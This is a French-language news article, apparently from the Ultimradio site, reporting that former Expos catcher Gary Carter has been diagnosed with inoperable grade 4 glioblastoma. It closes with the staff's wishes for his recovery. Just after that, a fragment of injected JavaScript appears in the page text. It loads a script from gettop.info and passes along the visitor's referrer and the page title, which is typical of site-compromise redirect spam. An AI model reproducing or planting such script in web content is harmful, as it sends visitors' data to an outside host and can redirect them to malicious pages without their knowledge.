Gary Carter, Ancien Receveur Des Expos, Atteint d’Un Cancer Inopérable


Facebooktwitterredditpinterestlinkedinmail

Une légende pour plusieurs fans de baseball de La Belle Province suite à ses exploits avec les Expos de Montréal, l’ex-receveur Gary Carter a reçu de biens mauvaises nouvelles samedi soir dernier, alors que les docteurs de Duke University (Caroline du Nord, US) sont certains à 99% que les quatre tumeurs retrouvées dans le cerveau de M. Carter sont malignes et inopérables. Il s’agît de tumeurs glioblastome de grade 4, qui n’offre à peu près aucune chance de survie après s’être attaquées au cerveau et système nerveux central. Selon les informations disponibles, ce type de cancer n’est pas d’origine familiale et se veut sporadique.

Après avoir souffert de migraines et pertes de mémoires dans les derniers mois, Gary Carter avait subit une imagerie par résonance magnétique (IRM) qui avait détectée quatre tumeurs dans le cerveau. Les biopsies performées sur une de ces tumeurs ont dès lors révélées le diagnostique annoncé samedi dernier à la famille de M. Carter.

Tous ces résultats seront officiellement confirmé demain, mardi, mais la famille se veut confiante comme en témoigne une série de communiqué remis aux médias.

Dans ces messages, la famille ne parle pas d’assoupir la souffrance possible de l’ex-joueur de baseball, mais bien de battre le cancer qui semble attaqué leur proche. Celle-ci mentionne également que le docteur personnel de Carter, Henry S. Friedman, se veut confiant et planifie attaquer les tumeurs et les réduire à néant.

Avant d’apprendre cette nouvelle, Gary Carter en était à sa deuxième année en tant qu’entraîneur de l’équipe de baseball de la Palm Beach Atlantic University.

L’entière équipe d’Ultimradio souhaite offrir ses voeux de prompt rétablissement à Gary Carter. Si sa carrière est un testament de sa persévérance, ce cancer ne tient aucune chance contre cette athlète.

s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) +  »;

Previous Dimmu Borgir avec l'Ochestre symphonique norvégienne.
Next Trois-Rivières Metal Fest 2011 : Sacrifice Confirmé

No Comment

Leave a reply

Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont indiqués avec *